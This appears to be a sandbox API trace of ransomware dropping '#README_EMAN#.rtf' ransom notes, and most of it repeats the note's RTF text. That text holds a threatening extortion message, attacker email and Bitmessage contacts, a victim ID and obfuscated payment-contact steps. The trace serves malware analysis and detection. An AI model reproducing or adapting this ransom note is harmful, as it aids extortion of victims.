\r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0291.115] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x2364cd8, cbMultiByte=8717, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd.\\par\r\n2. \\f1\\lang1049\\'d3\\'ee\\f0\\lang1033 u must c\\f1\\lang1049\\'ee\\f0\\lang1033 nfirm th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n, r\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd f\\f1\\lang1049\\'ee\\f0\\lang1033 ll\\f1\\lang1049\\'ee\\f0\\lang1033 w th\\f1\\lang1049\\'e5\\f0\\lang1033 instructi\\f1\\lang1049\\'ee\\f0\\lang1033 ns th\\f1\\lang1049\\'e0\\f0\\lang1033 t w\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nt t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u.\\par\r\n3. R\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 sit\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 nd \\f1\\lang1049\\'f1\\f0\\lang1033 lick \\f1\\lang1049 \"\\f0\\lang1033 L\\f1\\lang1049\\'ee\\f0\\lang1033 gin\\f1\\lang1049 \"\\f0\\lang1033 l\\f1\\lang1049\\'e0\\f0\\lang1033 b\\f1\\lang1049\\'e5\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 r us\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_in }}{\\fldrslt{https://bitmsg.me/users/sign_in\\ul0\\cf0}}}}\\f0\\fs20 , \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd \\f1\\lang1049\\'e0\\f0\\lang1033 nd click th\\f1\\lang1049\\'e5\\f0\\lang1033 \"Sign in\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n. \\f1\\lang1049 \\f0\\lang1033\\par\r\n4. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"\\f1\\lang1049\\'d1\\f0\\lang1033 r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 t\\f1\\lang1049\\'e5\\f0\\lang1033 R\\f1\\lang1049\\'e0\\f0\\lang1033 nd\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n5. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"N\\f1\\lang1049\\'e5\\f0\\lang1033 w m\\f1\\lang1049\\'e0\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n\\b 6. S\\f1\\lang1049\\'e5\\f0\\lang1033 nding m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 :\\par\r\nT\\f1\\lang1049\\'ee\\f0\\lang1033 :\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss: \\b BM-2cXRWRW5Jv5hxbhgu2HJSJrtPf92iKshhm\\par\r\n\r\n\\pard\\sl240\\slmult1 Subj\\f1\\lang1049\\'e5\\'f1\\f0\\lang1033 t:\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur ID: \\b 460F9943EA70F103\\par\r\nM\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 : \\b0 D\\f1\\lang1049\\'e5\\f0\\lang1033 scrib\\f1\\lang1049\\'e5\\f0\\lang1033 wh\\f1\\lang1049\\'e0\\f0\\lang1033 t \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u think n\\f1\\lang1049\\'e5\\f0\\lang1033 c\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 .\\par\r\n\r\n\\pard\\ri-74\\sa200\\sl240\\slmult1\\tx8378\\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"S\\f1\\lang1049\\'e5\\f0\\lang1033 nd m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\cf5\\b\\par\r\n\r\n\\pard\\sa200\\sl240\\slmult1\\fs28 GCMD9HhH\\cf0\\f1\\fs32\\lang1049\\par\r\n\\par\r\n}\r\n\x06H\x06*\x06'\x06 ", lpUsedDefaultChar=0x0) returned 8717 [0291.115] WriteFile (in: hFile=0x2ec, lpBuffer=0x2364cd8*, nNumberOfBytesToWrite=0x220d, lpNumberOfBytesWritten=0x374fdb4, lpOverlapped=0x0 | out: lpBuffer=0x2364cd8*, lpNumberOfBytesWritten=0x374fdb4*=0x220d, lpOverlapped=0x0) returned 1 [0291.116] CloseHandle (hObject=0x2ec) returned 1 [0291.116] GetFileAttributesW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\sr\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\sr\\#readme_eman#.rtf")) returned 0xffffffff [0291.116] GetLastError () returned 0x2 [0291.116] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\sr\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\sr\\#readme_eman#.rtf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2ec [0291.117] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES 